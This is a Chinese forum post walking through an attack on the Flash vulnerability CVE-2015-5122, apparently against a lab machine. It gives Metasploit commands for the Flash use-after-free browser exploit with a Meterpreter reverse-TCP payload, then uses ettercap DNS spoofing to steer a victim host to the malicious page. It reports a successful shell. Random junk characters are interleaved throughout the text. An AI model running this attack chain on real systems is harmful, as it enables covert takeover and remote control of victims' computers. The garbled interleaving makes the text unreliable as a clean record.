cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

. f. i2 Z- ], h 二、cve2015-5122漏洞实例演示虚拟机 ; @4 K' U! Y+ @5 g4 T

: o% O5 p# D( k 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： # `3 h1 Q( f: B) Z

! V# N/ a. z# ?, I. g! I search cve-2015-5122如图： 0 V \. z7 |) O4 J7 H' ]; ~5 e. v; H

' v. Z$ V3 `9 j: W! S" x/ Z7 f5 c ) H" ^, @: Q* J4 s4 B/ [) T) K

e3 Y# ]. I+ h1 n7 D 下面我们敲如下命令： + O N; d# {9 J+ d; z% [, l7 s

' d7 u7 d: p H) k a& ] use exploit/multi/browser/adobe_flash_opaque_background_uaf 4 \, b4 s* c6 p

7 v5 v2 X5 g0 f set PAYLOAD windows/meterpreter/reverse_tcp . I% U" b: ? B* w

* n% U9 o8 q5 v$ |4 T set LHOST 192.168.0.109 + W+ m! `* |% w$ K) @0 u

5 G1 C) m. p) j( o" J set URIPATH / /*根目录*/ " H4 i0 n$ ^+ G8 O/ q' X2 N

, _/ v. `* U; p3 K; m; b5 g. @# r- x set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 9 G r0 L) y7 T5 N% \% u. o/ b

/ }; A# x' y/ p& Z, i/ Y set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 # Q$ J( ]% J$ _

$ A- l3 E: r: g8 e. G6 K) [ 然后show options如图： . Q; o- r; P% Y# V

; l6 f w% X0 M4 U0 N& t2 F 5 k, s# p: l) P. n- \8 | }

* V# s. v8 B' Y6 K! h 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
7 a( z0 h: G: W0 @* X! i+ a $ Q" W% H S0 a

, }6 |: j: ` h) A 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 * z4 O3 H5 Q( q

) @6 h: T' a g, g* C8 i$ m Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf # v& b" ^9 l% s* @( [

3 T' D& Q4 n# _3 J( X* d ' ^4 b% H1 \) D

( _* v9 a' E+ T4 _; Z/ P5 j 成功了，这时候我们断开ettercap，如图： 1 @0 _. K; V$ k: B5 {

h" f$ _! m9 A8 k$ A$ Y: Y/ l$ } $ P" f$ Z% ^- E. c9 S4 x

/ G% V) N8 _! L3 d/ \ Screenshot如图： 4 B& k$ F$ p2 A7 Z

( q- O, h }* Q5 t, q2 @ + Y) W. z' h8 y8 x- l* d ^, B

' q# x3 z4 t' F+ P+ {* V0 V " T8 }) D; i8 N" U' m

		自动登录	找回密码
密码			立即注册